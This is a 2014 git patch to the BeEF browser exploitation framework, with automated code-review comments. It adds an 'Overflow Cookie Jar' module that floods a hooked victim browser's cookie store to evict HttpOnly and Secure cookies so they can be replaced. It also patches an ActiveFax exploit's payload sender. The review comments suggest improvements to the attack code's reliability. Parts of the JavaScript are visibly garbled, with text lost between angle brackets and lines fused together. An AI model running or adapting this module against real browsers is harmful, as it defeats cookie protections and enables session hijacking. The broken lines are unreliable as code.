From 0e57fb0be1f0f6d91438316490203c3f613b8d94 Mon Sep 17 00:00:00 2001
From: bmantra
Date: Sun, 19 Jan 2014 19:58:14 +0100
Subject: [PATCH] Inital version of CookieJar overflow module. And minor bugfix of active fax overflow module.
---
 .../overflow_cookiejar/command.js | 79 +++++++++++++++++++
 .../overflow_cookiejar/config.yaml | 15 ++++
 .../overflow_cookiejar/module.rb | 16 ++++
 .../active_fax_beef_bind/command.js | 2 +-
 4 files changed, 111 insertions(+), 1 deletion(-)
 create mode 100644 modules/browser/hooked_domain/overflow_cookiejar/command.js
 create mode 100644 modules/browser/hooked_domain/overflow_cookiejar/config.yaml
 create mode 100644 modules/browser/hooked_domain/overflow_cookiejar/module.rb
diff --git a/modules/browser/hooked_domain/overflow_cookiejar/command.js b/modules/browser/hooked_domain/overflow_cookiejar/command.js
new file mode 100644
index 000000000..8671568b1
--- /dev/null
+++ b/modules/browser/hooked_domain/overflow_cookiejar/command.js
@@ -0,0 +1,79 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var preserveCookies = '<%= @preserveCookies %>'
+
+ var initialtimestamp;
+ var currenttimestamp;
+ var i = 0;
+ var preservedCookies;
+
+ function setCookie(cname,cvalue){
+ document.cookie = cname + "=" + cvalue;
+ }
+
+ function getCookie(cname){
+ var name = cname + "=";
+ var ca = document.cookie.split(';');
+
+ for(var i=0; i 0){
+ var cookie = cookies[0];
+ var eqPos = cookie.indexOf("=");
+ var name = eqPos > -1 ? cookie.substr(0, eqPos) : cookie;
+
+ document.cookie = name + "=;expires=Thu, 01 Jan 1970 00:00:00 GMT";
+ if (cookies.length > 1){
+ //Timeout needed because otherwise cookie write loop freezes render thread
+ setTimeout(deleteAllCookies,1);
+ }
+ else{
+ if (preserveCookies){
+ var pc = preservedCookies.split(';');
+
+ for(var i=0; i", <%= @command_id %>, 'Attempt to overflow the Cookie Jar completed');
+ }
+ }
+ }
+
+ function overflowCookie() {
+ if(getCookie(initialtimestamp) === "BeEF") {
+ currenttimestamp = Date.now();
+ setCookie(currenttimestamp,"BeEF");
+ //Timeout needed because otherwise cookie write loop freezes render thread
+ setTimeout(overflowCookie, 1);
+ }
+ else{
+ deleteAllCookies();
+ }
+ }
+
+ function overflowCookieJar(){
+ preservedCookies = document.cookie;
+ initialtimestamp = Date.now();
+ setCookie(initialtimestamp,"BeEF");
+ overflowCookie();
+ }
+
+ overflowCookieJar();
+
+});
+
diff --git a/modules/browser/hooked_domain/overflow_cookiejar/config.yaml b/modules/browser/hooked_domain/overflow_cookiejar/config.yaml
new file mode 100644
index 000000000..7c0f7090d
--- /dev/null
+++ b/modules/browser/hooked_domain/overflow_cookiejar/config.yaml
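Review bot: `preserveCookies` is bound as a string, `var preserveCookies = '<%= @preserveCookies %>'`, so the `if (preserveCookies)` test in deleteAllCookies is true for any non-empty rendering of the checkbox — if the unchecked state renders as the string `false` (the option is declared in module.rb's `self.options`, how it is rendered is not visible here), the preserve branch can never be skipped; compare explicitly, `var preserveCookies = '<%= @preserveCookies %>' === 'true';`. The overflowCookie/setTimeout loop has no iteration cap: on a browser that never evicts the initial cookie it re-arms a timer indefinitely and the module never sends a result, so a counter checked alongside `getCookie(initialtimestamp) === "BeEF"` that falls through to deleteAllCookies with a distinct "gave up" result would bound it. The outer `var i = 0;` is unused, since each loop declares its own `i`, and the first line of the callback is missing its semicolon. This rendering of the hunk has lost the text between `<` and `>` characters (the getCookie loop body and the `beef.net.send` call are fused into neighbouring lines), so those lines could not be reviewed.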
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ overflow_cookiejar:
+ enable: true
+ category: ["Browser", "Hooked Domain"]
+ name: "Overflow Cookie Jar"
+ description: "This module attempts to perform John Wilander's CookieJar overflow. He demonstrated this in his Owasp 1-liner project. With this module, cookies that have the HTTPOnly-flag and/or HTTPS-flag can be wiped. You can try to recreate these cookies afterwards as normal cookies."
+ authors: ["Bart Leppens"]
+ target:
+ working: ["S","C","FF","IE"]
diff --git a/modules/browser/hooked_domain/overflow_cookiejar/module.rb b/modules/browser/hooked_domain/overflow_cookiejar/module.rb
new file mode 100644
index 000000000..f3dd0478d
--- /dev/null
+++ b/modules/browser/hooked_domain/overflow_cookiejar/module.rb
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Overflow_cookiejar < BeEF::Core::Command
+ def self.options
+ return [
+ {'name' => 'preserveCookies', 'type' => 'checkbox', 'ui_label' => 'Attempt to preserve all non-httpOnly cookies', 'checked' => 'true'}
+ ]
+ end
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/beefbind/beef_bind_exploits/active_fax_beef_bind/command.js b/modules/exploits/beefbind/beef_bind_exploits/active_fax_beef_bind/command.js
index a3ee88079..c06221343 100644
--- a/modules/exploits/beefbind/beef_bind_exploits/active_fax_beef_bind/command.js
+++ b/modules/exploits/beefbind/beef_bind_exploits/active_fax_beef_bind/command.js
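Review bot: `return [` in `self.options` is redundant in Ruby — the array literal is already the method's last expression — and the two method definitions in module.rb run together with no separating blank line. Dropping the `return` and adding a blank line before `def post_execute` would match the usual Ruby layout. The `'checked' => 'true'` default is a string value; whatever the template renders for the unchecked state should be documented next to the option, e.g. `# rendered into command.js as the string 'true'/'false'`, since the JS side depends on it (raised on the command.js hunk).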
@@ -35,7 +35,7 @@ sendpayload = function(payload, uri, timeout, logdata){
 this.send(ui8Data);
 };
 }
- xhr.open("POST", url, true);
+ xhr.open("POST", uri, true);
 xhr.setRequestHeader("Content-Type", "text/plain");
 xhr.setRequestHeader('Accept','*/*');
 xhr.setRequestHeader("Accept-Language", "en");
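Review bot: The rename fixes the reference to the undefined `url`, but the enclosing function shown in the hunk header, `sendpayload = function(payload, uri, timeout, logdata){`, is assigned without a declaration and so becomes an implicit global unless it is declared earlier in the file; `var sendpayload = function(payload, uri, timeout, logdata){` keeps it scoped. The `timeout` parameter is not applied in the visible lines — if it is meant to bound the request, `xhr.timeout = timeout;` after `open` would do it, though sendpayload starts before and ends after this hunk so it may already be used elsewhere.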